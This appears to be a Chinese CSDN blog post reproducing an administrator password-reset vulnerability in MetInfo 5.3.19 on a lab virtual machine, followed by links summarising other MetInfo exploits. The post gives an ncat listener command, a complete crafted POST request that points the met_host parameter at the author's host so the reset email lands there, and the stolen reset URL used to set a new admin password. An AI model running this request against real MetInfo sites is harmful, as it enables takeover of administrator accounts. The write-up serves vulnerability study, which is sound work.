metinfo 5.3.19密码重置漏洞

最新推荐文章于 2024-06-28 20:17:39 发布
最新推荐文章于 2024-06-28 20:17:39 发布
阅读量3.5k 收藏 1
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/83105928
版权

安装完成之后,即便之前已经将各目录设置为777了,到这一步时,也会将confg/config_db.php设置为只读。
在这里插入图片描述
查看改文件,发现确实是刚修改的。
在这里插入图片描述

步骤

先在一台metinfo服务器能访问的机器上设置监听80端口,如果metinfo能访问公网则可以设置公网服务器的IP,这里我就只设置为我metinfo所在虚拟机的宿主机的IP了。

C:\Users\caiqiqi>ncat -lvv 80
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80

在burp中构造如下请求:

POST /admin/admin/getpassword.php?met_host=192.168.96.1 HTTP/1.1
Host: 192.168.96.129
Content-Length: 93
Cache-Control: max-age=0
Origin: http://192.168.96.129
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3580.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.96.129/admin/admin/getpassword.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bdshare_firstime=1537607377172; PHPSESSID=88ff446fa200097801dbc105bd91fb27; page_iframe_url=http://192.168.96.129/index.php?lang=cn&pageset=1; re_url=http%3A%2F%2F192.168.96.129%2Fadmin%2F
Connection: close

action=next2&abt_type=2&admin_mobile=77caikiki%40gmail.com&submit=%E4%B8%8B%E4%B8%80%E6%AD%A5

然后回返回这样。
在这里插入图片描述
然后在宿主机上的ncat可以看到传来的流量:
在这里插入图片描述
向我指定的met_host192.168.96.1passwordmail.php发送了POST请求。
在这里插入图片描述
其中有一个a标签,里面是重置密码邮件中用于重置密码的url:

http://192.168.96.129/admin/admi
n/getpassword.php?p=3ddePPh60cYObk8%2Bvjaggw%2BaoSYNrzFyO1%2FD7FeDSJ9S0F3PTxziVm
oLko8TrDQ0k0hD%2F65ytaW78BoqDXx2WbM

访问这个链接得到:
在这里插入图片描述
即可重置为任意密码。
使用新的密码成功登陆。
在这里插入图片描述

参考

https://blog.csdn.net/sinat_28757329/article/details/78868499

caiqiiqi
关注
专栏目录
MetInfo任意文件读取】--任意文件读取漏洞
m0_63241485的博客
08-29 3754
任意文件读取漏洞分析
metinfo mysql_Metinfo 5.3.17 前台SQL注入漏洞
weixin_29178069的博客
02-01 487
Metinfo 8月1日升级了版本,修复了一个影响小于等于5.3.17版本(几乎可以追溯到所有5.x版本)的SQL注入漏洞。这个SQL注入漏洞不受软WAF影响,可以直接获取数据,影响较广。### 0x01. 漏洞原理分析漏洞出现在 `/include/global.func.php` 文件的 `jump_pseudo` 函数:```/*静态页面跳转*/function jump_pseudo(){...
任意密码重置漏洞
最新发布
weixin_62707591的博客
06-28 1106
1. 任意密码重置漏洞原理 2. 任意密码重置漏洞产生原因 3. 任意密码重置漏洞场景 3.1 验证码爆破 3.2 验证凭证回传 3.3 验证凭证未绑是用户 3.4 跳过验证步骤 3.5 凭证可预测 3.6 同时向多个账户发送凭证 4. 任意密码重置经典案例 4.1 中国人寿某重要系统任意账户密码重置 4.2 米鼠网设计逻辑的缺陷可重置任意用户密码 5. 权限绕过漏洞 5.1 水平越权 5.2 垂直越权
MetInfo 5.3.19 变量覆盖漏洞
weixin_51681694的博客
05-04 330
MetInfo5.3.19 存在变量覆盖,导致可任意用户密码重置 见网上都没有详细的解释,我就来写一下顺便学习学习
Metinfo 5.3.19管理员密码重置漏洞复现
weixin_34101784的博客
05-26 792
Metinfo 5.3.19管理员密码重置漏洞 操作系统:Windows10专业版 kali linux 网站环境:UPUPW 5.3 使用工具:burpsuite1.7 beta 漏洞分析 #密码重置过程中验证不严 #漏洞涉及到的几个文件分别是: admin/admin/getpassword.php include/common.inc....
metinfo 5.3.19 管理员密码重置
PWFUX72376的博客
07-23 556
安装metinfo5.3.19 注册 点击忘记密码输入注册用户名 burp拦截 post请求后接指定地址和端口 对端口进行监听 监听到的数据中 a标签中就是重置密码的url 复制url地址字浏览器打开 可输入任意新密码 登录输入用户名密码即可进入后台 转载于:https://www.cnblogs.com/Scholar...
metinfo5.3mysql支持_MetInfo5.3.19安装过程过滤不严导致Getshell
weixin_35207054的博客
02-17 321
前言前几天在先知看到的漏洞,就很想写个分析过程了的,因为比赛培训和在审计一个CMS拖到了今天。环境Web: phpstudySystem: Windows 7 X64Browser: Firefox QuantumPython version : 2.7Tools: PhpStorm 2017.3.3、Seay源代码审计系统任意文件删除漏洞复现POC前提:需要由对应的删除权限flienamecsv...
密码重置漏洞
小羊的博客
09-11 2594
密码重置漏洞 概念 随着互联网的快速发展,在线支付业务的日渐成熟,大批的网上商城涌入互联网.为了方 便网上商城的快速上线,很多该类型的应用程序在未能严格审查源码的情况下就开始上线,导致很多逻辑错误类型的漏洞出现在应用程序中,而密码重置漏洞便是其中的一种。 漏洞位置在找回密码处,由于验证设计过于简单,而且对校验码的校验使用次数没有 进行限制,导致正确的验证码可以被枚举爆破,从而重置密码。此方法也是最常见的重置密 码的方式,因为大多数厂商最开始的设置都是采取的4-6 位纯数字验证码的验证方式,而.
MetInfo5.3管理员密码重置漏洞
HeTuiPei的博客
07-23 765
需要工具Burp 虚拟机kali 浏览器 点击忘记密码 下一步 输入已知用户名或者邮箱点击下一步用Burp拦截 右键发送到Repeater 在第一行php后面拼接?met_host虚拟机kali的ip地址:端口号 拼接完成后 用虚拟机监听拼接的端口号 点击GO 虚拟机就会监听到信息 里面包含两个网页地址复制粘贴用浏览器打开 就完 ...
Metinfo 5.3 后台getshell(远程文件包含漏洞)分析
__Curtain_
08-30 6160
最近准备入代码审计的坑,拿Metinfo来练练手,先找了下以前的版本整理下思路。 看了下大神的文章,代码审计的方法总体上分为两种:     1. 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑可以是一个函数,或者是条小小的条件判断语句。     2. 根据不同编程语言的特性,及其历史上经常产生漏洞的一些函数,功能,把这些点找出来,在分析函数调用时的参数,如果...
记一次MetInfo6.0.0文件包含漏洞复现
weixin_55404107的博客
10-20 1790
进行漏洞复现,读取敏感文件
MetInfo企业网站管理系统 v5.2.8
04-04
MetInfo 企业网站管理系统,完美实现"电脑网站+手机网站+微信公众号"三位网络入口为一体的企业网站管理系统。利用一个后台,就能够便捷的管理电脑网站、手机网站、微信公众号,信息内容都可以一致同步推送。微信公众号管理系统让你无需支付任何费用就可以使用开发模式,无任何限制,并且能够免费使用开发模式实现的功能。 微信是手机端的入口之一,并不是所有的用户都想在微信上关注你,手机网站也是必要的,还需要有电脑网站,无论是在电脑上还是用手机上,手机装或是没装微信,都能够找到你的企业,这样就形成了一个互联网闭环,这个闭环能够实现宣传效果最大范围的扩散。而MetInfo则将电脑网站、手机网站和微信营销做成一体,完美的实现了网络营销闭环。 微信公众号、手机网站、电脑网站,企业经常需要登录到三个平台操作,不仅繁琐而且难实现信息同步推送还容易出现信息误差。而MetInfo,只需要一个平台,就能够便捷的管理电脑网站、手机网站、微信公众号,信息内容都可以一致同步推送。 电脑网站或手机网站可以通过做搜索引擎优化(SEO)来获取新用户,不管是否成功都可以引导添加微信公众号,而微信公众号则可以通过信息推送以及便于用户关注的特性维护这些用户关系并强化用户关系,最后将这些强关系用户再次转化成订单或引导分享朋友圈来实现扩散宣传。这样就形成了一个完善的网络营销体系。而MetInfo就提供了这一整套有效的网络营销体系。 MetInfo可以为企业打造出大气漂亮且具有营销力的精品网站。 客官久等了,MetInfo v5.2.8 新版发布!请及时升级! MetInfo v5.2.8 更新说明(2014年8月15日发布更新) MetInfo v5.2.8为了提升用户体验,增加了留言表单自定义字段、栏目前台自定义显示、产品联合查询标签等新功能,优化了文章模块、热门标签、管理员权限等多个方面的系统原有功能,修复了搜索产品、网站体检、图片模块等多个方面存在的系统缺陷。 新增 1.留言表单自定义字段功能,可自定义任意字段; 2.栏目前台显示自定义功能,可自定义显示或隐藏栏目; 3.产品联合查询标签(metlabel_conjunctive),支持多参数联合查询; 4.methtml_getarray标签增加随机调用内容、定点调用内容方式,可以调取数据内容的content字段; 5.栏目搜索功能(仅在后台内容管理中); 优化 1.文章模块编辑后,无法自动获取新的简短描述; 2.热门标签“替换为”为空时,保留“原文字”并给其加上超链接; 3.更新阿里巴巴图标以及代码的展示方式,修复浏览器无法联系在线旺旺; 4.非创始人管理员可以查看升级内容,但不能升级; 5.同步栏目设置与内容管理的栏目排列方式; 6.“指纹对比”功能修改为“文件校对”功能; 7.重新设计后台内容管理图标; 8.侧栏当前导航增加CSS类,导航显示效果不需额外写JS; 9.首页可正常调用前台栏目数组columnimg值(存放栏目图片的地址); 10.支持远程图片调用; 11.安装包支持繁体中文,方便港澳台用户使用; 修复 1.搜索产品参数(methtml_parasearch标签),会搜索附件的文件地址,降低了搜索准确性; 2.网站体检无法修复应用文件夹不存在或文件完全丢失的文件; 3.图片模块生成的缩略图模糊,缩略图尺寸不受后台控制; 4.导入数据库时会修改cache文件权限,导致cache文件无写的权限,使在线升级、数据保存等操作无法完成; 5.下载模块内容在编辑时改变所属栏目,字段显示出错; 6.语言变量可为空,却不能搜索空值,导致这个变量无法在后台修改; 7.搜索引擎中的访问来源无法统计来源于谷歌和雅虎的信息; 8.简介栏目下添加下载栏目,下载栏目的子栏目,自定义静态页面的名称,则开启伪静态时,下载栏目的子栏目会跳转到404页面; 9.不同语言网站的首页链接都为默认首页链接; 10.搜索页面搜索出的图片模块内容地址出错; 11.安装包默认底部信息错误显示为2008-2012; 12.英文后台会员管理的部分文字为中文; 13.在线交流,淘宝旺旺在部分浏览器中无法打开; 14.系统自带的metv4模板,图片模块的列表展示页,奇数行右边会空出一个位置(升级用户如出现这种情况,请下载最新版本V4模板); 15.后台安全管理,删除安装文件功能,可改变URL删除任意目录; 16.产品参数高级搜索(methtml_advsearch标签)无法指定搜索某一个参数字段的内容; 17.批量上传中生成选中栏目的CSV文件时,如果栏目名称中带有‘/’等非法字符时。无法正常生成CSV文件; 18.栏目设置“新窗口打开”无效; 19.产品模块参数设置中,设置参数只在某个栏目下显示,前台仍然是在所有栏目下显示; 升级后会不会影
文件读取漏洞复现(Metinfo 6.0.0)
m0_56578216的博客
08-31 882
安装phpstudy,下载MetInfo 6.0.0版本软件,复制到phpstudy目录下的www目录中。
代码审计-MetInfo CMS任意文件读取漏洞
weixin_30878501的博客
05-19 227
0x01 代码分析 发现在app\system\include\module\old_thumb.class.php疑似有任意文件读取漏洞 public function doshow(){ global $_M; $dir = str_replace(array('../','./'), '', $_GET['dir']); ...
01、版本管理-GIT
快把钟哥带走
06-12 179
一、版本控制 版本控制,通过文档控制记录各个模块的改动,并给每次改动添加序号,用于存储、追踪目录和文件的修改历史。 二、版本控制软件 GIT 分布式版本控制系统 SVN 集中式版本控制系统 三、git安装 1、git下载 - https://git-scm.com/downloads - https://pan.baidu.com/s/1kU5OCOB#list/path=%2...
关于METINFO5.3漏洞引发的变量覆盖漏洞
weixin_30781775的博客
05-06 323
一.$$引起的变量覆盖漏洞, 1、Include 调用了flag.php文件(调用文件还可以有require_once()或者require());2、$_200,$_403 定义两个参数,以及参数值。3、判断访问页面的方法是否为post方法和有没有参数flag。4、再接着两个foreach函数遍历数组函数,然后再将获取到的数组键名作为变量,数组中的键值作为变量的值。5、还有一个i...
metinfo全版本csrf漏洞(可导致重装)
u011066706的专栏
04-17 1998
漏洞文件/admin/app/batch/csvup.php 代码 <?php $depth='../'; require_once $depth.'../login/login_check.php'; setlocale(LC_ALL,array('zh_CN.gbk','zh_CN.gb2312','zh_CN.gb18030')); $codeold='gbk'; $codenew='u
米拓5.3 mysql支持off,Metinfo 5.3.17 前台SQL注入漏洞分析
weixin_39557813的博客
03-27 233
Metinfo 8月1日升级了版本,修复了一个影响小于等于5.3.17版本(几乎可以追溯到所有5.x版本)的SQL注入漏洞。这个SQL注入漏洞不受软WAF影响,可以直接获取数据,影响较广。漏洞出现在 /include/global.func.php 文件的 jump_pseudo 函数:/*静态页面跳转*/function jump_pseudo(){global $db,$met_skin_us...
米拓5.3 mysql支持off,关于METINFO5.3漏洞引发的变量覆盖漏洞
weixin_39890289的博客
03-27 153
一.$$引起的变量覆盖漏洞, 1、Include 调用了flag.php文件(调用文件还可以有require_once()或者require());2、$_200,$_403 定义两个参数,以及参数值。3、判断访问页面的方法是否为post方法和有没有参数flag。4、再接着两个foreach函数遍历数组函数,然后再将获取到的数组键名作为变量,数组中的键值作为变量的值。5、还有一个if判断语句,判断...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值